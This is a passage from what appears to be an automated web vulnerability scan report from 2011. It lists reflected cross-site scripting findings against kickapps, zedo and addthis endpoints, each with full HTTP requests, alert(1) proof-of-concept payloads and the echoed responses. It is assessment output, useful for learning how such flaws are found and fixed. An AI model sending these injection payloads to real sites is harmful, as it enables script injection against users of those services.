alert(1)//8cda9d9ad91&fromDate=04-06-2011
/**
Array
(
[url] => ht
...[SNIP]...
1.68. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the dName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8676a'%3balert(1)//8c88e991541 was submitted in the dName parameter. This input was echoed as 8676a';alert(1)//8c88e991541 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=8676a'%3balert(1)//8c88e991541&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:27 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87684

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
place holder in case you need to check domain hosting js
   return true;
}

function ka_start() {
   if (!ka_verifyDomain()){
   }
   else {
       var comment_content_container = document.getElementById('8676a';alert(1)//8c88e991541');
       if (comment_content_container == null) {
    var bod = document.body;
    comments = document.createElement('div');
    comments.setAttribute("id", "867
...[SNIP]...
1.69. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the dName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2f2f"%3balert(1)//db5a3dbef58 was submitted in the dName parameter. This input was echoed as f2f2f";alert(1)//db5a3dbef58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=f2f2f"%3balert(1)//db5a3dbef58&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:24 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87684

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
f58');
       if (comment_content_container == null) {
    var bod = document.body;
    comments = document.createElement('div');
    comments.setAttribute("id", "f2f2f";alert(1)//db5a3dbef58");
    bod.appendChild(comments);
       }
       ka_writeContainer();
       var commentsAdd = document.getElementById('ka_orig_button');
if (commentsAdd == null) {
var bo
...[SNIP]...
1.70. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53a11'%3balert(1)//ce95be82201 was submitted in the id parameter. This input was echoed as 53a11';alert(1)//ce95be82201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html53a11'%3balert(1)//ce95be82201&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:58 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 89133

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html53a11%27%3Balert%281%29%2F%2Fce95be82201";
var ka_adminUser = 'wptz';
var ka_commentsLis
...[SNIP]...
acebook.get_sessionState().waitUntilReady(function() {
var attachment = {'name':'Guard Prepares For Possible Federal Shutdown','href':'http://www.wptz.com/news/27483035/detail.html53a11';alert(1)//ce95be82201','description':commentText,'caption':'{*actor*} commented on this article.'};
FB.Connect.streamPublish(noQuoteText, attachment, null, null,'',null);
});

...[SNIP]...
1.71. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [pSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the pSize request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2660d%3balert(1)//b550bd280e9 was submitted in the pSize parameter. This input was echoed as 2660d;alert(1)//b550bd280e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=2660d%3balert(1)//b550bd280e9&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:21 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87727

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
isRatedByMe: F
var ka_mediaId = "1234";
var ka_isRatedByMe = "";
var ka_mediaTags = "";
var ka_alertBadLoginMsg = "Log in Failed. Please check your login credentials and try again.";
var ka_pageSize = 2660d;alert(1)//b550bd280e9;
var ka_forgotPasswdLink = 'http://ulocal.wptz.com/user/displayUserForgotPwd.kickAction?as=62976&STATUS=MAIN';
var ka_timezoneAbbr ='EST';
var ka_timezoneOffset = -4;
/********************************
...[SNIP]...
1.72. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [tzAbbr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the tzAbbr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e88bb'%3balert(1)//6b713801453 was submitted in the tzAbbr parameter. This input was echoed as e88bb';alert(1)//6b713801453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=ESTe88bb'%3balert(1)//6b713801453&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:18 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87703

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
heck your login credentials and try again.";
var ka_pageSize = 5;
var ka_forgotPasswdLink = 'http://ulocal.wptz.com/user/displayUserForgotPwd.kickAction?as=62976&STATUS=MAIN';
var ka_timezoneAbbr ='ESTe88bb';alert(1)//6b713801453';
var ka_timezoneOffset = -7;
/**********************************************************
* Globals
**********************************************************/
if(typeof(RPXNOW)!="undefined"){
   
...[SNIP]...
1.73. http://clientapps.kickapps.com/hearst/comments/start.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/start.php

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cdc2'%3balert(1)//f7110da1efd was submitted in the id parameter. This input was echoed as 9cdc2';alert(1)//f7110da1efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/start.php?as=62976&id=http://www.wptz.com/news/27483035/detail.html9cdc2'%3balert(1)//f7110da1efd&n=Guard%20Prepares%20For%20Possible%20Federal%20Shutdown&d=The%20head%20of%20the%20Vermont%20National%20Guard%20says%20a%20federal%20shutdown%20would%20put%20around%20400%20members%20on%20furlough%20and%20hundreds%20more%20working%20but%20unsure%20when%20they%20would%20be%20paid.&tzAbbr=EST HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:31 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 941

function verifyDomain() {
   var currentLocation = new String(window.location.href);
   var ka_communitySite = new String('http://ulocal.wptz.com/');
   //alert('current location:'+currentLocation+' ka_comm
...[SNIP]...
ion.indexOf(ka_communitySite)!=-1){
       return false;
   }
   return true;
}

var ka_request = 'http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html9cdc2';alert(1)//f7110da1efd&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Fe
...[SNIP]...
1.74. http://clientapps.kickapps.com/hearst/comments/start.php [tzAbbr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/start.php

Issue detail

The value of the tzAbbr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c020a'%3balert(1)//c58225a0fcb was submitted in the tzAbbr parameter. This input was echoed as c020a';alert(1)//c58225a0fcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/start.php?as=62976&id=http://www.wptz.com/news/27483035/detail.html&n=Guard%20Prepares%20For%20Possible%20Federal%20Shutdown&d=The%20head%20of%20the%20Vermont%20National%20Guard%20says%20a%20federal%20shutdown%20would%20put%20around%20400%20members%20on%20furlough%20and%20hundreds%20more%20working%20but%20unsure%20when%20they%20would%20be%20paid.&tzAbbr=ESTc020a'%3balert(1)//c58225a0fcb HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:54 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 941

function verifyDomain() {
   var currentLocation = new String(window.location.href);
   var ka_communitySite = new String('http://ulocal.wptz.com/');
   //alert('current location:'+currentLocation+' ka_comm
...[SNIP]...
l+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=ESTc020a';alert(1)//c58225a0fcb&pSize=&dName=&loginAtBottom=';
if (verifyDomain()){
   ka_loadCommentsForm();

   
}

function ka_loadCommentsForm(){
   
       
       aObj = new JSONscriptRequest(ka_request);
       aObj.buildScriptTag();
       
...[SNIP]...
1.75. http://d7.zedo.com/jsc/d3/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed80e"-alert(1)-"40a53fb6c70 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=ed80e"-alert(1)-"40a53fb6c70&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:23 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=My@jTcGt89atDQZBkeuqQvnQ~041111;expires=Thu, 08 Apr 2021 16:41:23 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Date: Mon, 11 Apr 2011 16:41:23 GMT
Connection: close
Content-Length: 3161

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
7;g=172;m=34;w=51;i=0;u=unknown;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=ed80e"-alert(1)-"40a53fb6c70http://www.newsmax.com/surveys/DonaldTrump/Donald-Trump-for-President-/id/11/kw/default?PROMO_CODE=BF8D-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOu
...[SNIP]...
1.76. http://d7.zedo.com/jsc/d3/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f741"-alert(1)-"6ea924cc82f was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=3f741"-alert(1)-"6ea924cc82f&z=655102444 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1; ZEDOIDA=Ly@jTcGt89Y-7tVXMtikPSik~041111; FFgeo=2241452; ZEDOIDX=29

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "199c199-4429-48dea89497900"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1482268137
Cache-Control: max-age=185
Expires: Mon, 11 Apr 2011 17:24:30 GMT
Date: Mon, 11 Apr 2011 17:21:25 GMT
Connection: close
Content-Length: 2164

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


                   var zzSt
...[SNIP]...
=unknown;p=6;f=1045847;h=966322;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=3f741"-alert(1)-"6ea924cc82fhttp://news1.newsmax.com/repeal/?PROMO_CODE=BE0A-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...
1.77. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v10-003/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6171f"-alert(1)-"f47e5bad5e1 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v10-003/d7/jsc/flr.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=6171f"-alert(1)-"f47e5bad5e1&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=NS@jTcGt89Z-2ItluoIEWYR-~041111;expires=Thu, 08 Apr 2021 16:41:25 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=31
Date: Mon, 11 Apr 2011 16:41:25 GMT
Connection: close
Content-Length: 3120

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
=unknown;p=6;f=1045847;h=966322;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=6171f"-alert(1)-"f47e5bad5e1http://news1.newsmax.com/repeal/?PROMO_CODE=BE0A-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...
1.78. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ingeniux.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 13036<script>alert(1)</script>2aba7ef527a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ingeniux.com/p.json?callback=_ate.ad.hpr13036<script>alert(1)</script>2aba7ef527a&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.ingeniux.com%2Fsolutions%2Fwebsite_optimization&1rvjqwy HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1302197723.1FE|1302197723.60|1302197723.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 373
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:18:16 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:18:16 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308296.1FE|1302308296.60|1302197723.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:18:15 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:18:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:16 GMT
Connection: close

_ate.ad.hpr13036<script>alert(1)</script>2aba7ef527a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.ingeniu
...[SNIP]...
1.79. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.marqui.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 66809<script>alert(1)</script>0ed15865e19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

